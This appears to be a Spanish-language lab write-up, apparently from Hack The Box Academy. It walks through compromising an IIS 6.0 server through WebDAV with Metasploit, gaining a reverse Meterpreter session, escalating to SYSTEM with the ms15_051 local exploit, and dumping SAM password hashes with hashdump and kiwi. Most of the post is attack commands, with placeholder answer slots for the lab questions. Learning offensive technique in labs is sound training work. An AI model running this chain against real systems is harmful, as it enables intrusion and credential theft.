Post

Explotación Windows - Escalada de Privilegios y Meterpreter

Explotación Windows - Escalada de Privilegios y Meterpreter

Metasploit Post-Explotación en Windows: Escalada y Volcado de Credenciales

1. Ficha Técnica y Reconocimiento Inicial

ComponenteDetalleNotas
Objetivo (RHOST)10.129.203.65 (ACADEMY-MSF2-WIN02)Sistema Windows con servicios de IIS.
Atacante (LHOST)[Tu_IP_en_la_VPN]IP asignada al adaptador tun0.
Servicio ExplotadoMicrosoft IIS httpd 6.0 (Puerto 80/TCP)Confirmado vía db_nmap -sV.
Exploit Inicialexploit/windows/iis/iis_webdav_upload_aspCVE-2004-xxxx (Acceso RCE/WebDAV)

2. Fase de Explotación y Acceso Inicial

El objetivo fue comprometido usando una vulnerabilidad de WebDAV en IIS 6.0 que permite la carga y ejecución de archivos .asp.

  1. Configuración del Exploit y Payload (Reverse TCP):

    1
    2
    3
    4
    
     msf6 > use exploit/windows/iis/iis_webdav_upload_asp
     msf6 exploit(...) > set RHOST 10.129.203.65
     msf6 exploit(...) > set LHOST [Tu_IP]
     msf6 exploit(...) > run -j # Usamos -j para background la sesión automáticamente
    
  2. Verificación de la Sesión y Privilegios:

    • Una vez que se establece la conexión, se interactúa con la sesión Meterpreter.
    1
    2
    
     msf6 > sessions -i 1
     meterpreter > getuid
    
    • Resultado Obtenido: Server username: NT AUTHORITY\NETWORK SERVICE (O un usuario de bajo privilegio similar).

ARTIFACTO 1 (Respuesta 1): El usuario inicial de la sesión fue: [Coloca aquí tu primera respuesta]

3. Fase de Escalada de Privilegios (Privilege Escalation)

Dado que el getuid reveló un usuario de bajo nivel (NETWORK SERVICE), la extracción de hashes (hashdump) falló con el error: Operation failed: Incorrect function. Esto confirma la necesidad de elevar los permisos a NT AUTHORITY\SYSTEM.

  1. Búsqueda Automatizada de Exploits Locales:

    • Regresamos al prompt de msf6 y utilizamos el módulo local_exploit_suggester.
     meterpreter > background 
     msf6 > use post/multi/recon/local_exploit_suggester
     msf6 post(...) > set SESSION 1
     msf6 post(...) > run
    
    • Metodología: El suggester automatiza el proceso de correlacionar el OS target (ej. Windows 2003 Server) con los exploits de kernel conocidos dentro de la base de datos de Metasploit.
  2. Ejecución del Exploit Local:

    • El módulo nos sugiere el exploit ms15_051_client_copy_image.
     msf6 > use exploit/windows/local/ms15_051_client_copy_image
     msf6 exploit(...) > set SESSION 1
     msf6 exploit(...) > set LHOST [Tu_IP] 
     msf6 exploit(...) > run
    
    • Resultado: Se obtiene una nueva sesión Meterpreter (ej. sessions 2).
  3. Confirmación de Éxito:

     msf6 > sessions -i 2
     meterpreter > getuid
    
    • Resultado Esperado: Server username: NT AUTHORITY\SYSTEM (¡Acceso de administrador total!)

4. Fase de Volcado de Credenciales (Looting)

Con el nivel de SYSTEM, ahora podemos acceder al Security Account Manager (SAM) y extraer los hashes.

  1. Carga de la Extensión Kiwi (Mimikatz):

    • Debido a los cambios en las versiones modernas de Metasploit, los comandos avanzados de credenciales (lsa_dump_sam) requieren la extensión kiwi (basada en la herramienta Mimikatz).
     meterpreter > load kiwi
    
  2. Volcado de Hashes del SAM/LSA:

    • Usamos el comando hashdump estándar de Meterpreter (o kiwi::lsa_dump_sam si la versión es muy reciente) para obtener las credenciales locales.
     meterpreter > hashdump 
    
  3. Extracción de la Credencial Requerida:

    • Analizamos la salida, que sigue el formato Usuario:RID:HashLM:HashNTLM:::, y buscamos al usuario htb-student.

    Ejemplo de Salida (htb-student):

    1
    
     htb-student:1009:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY:::
    

ARTIFACTO 2 (Respuesta 2): El hash NTLM (YYYY…) para el usuario htb-student es: [Coloca aquí tu segunda respuesta]

This post is licensed under CC BY 4.0 by the author.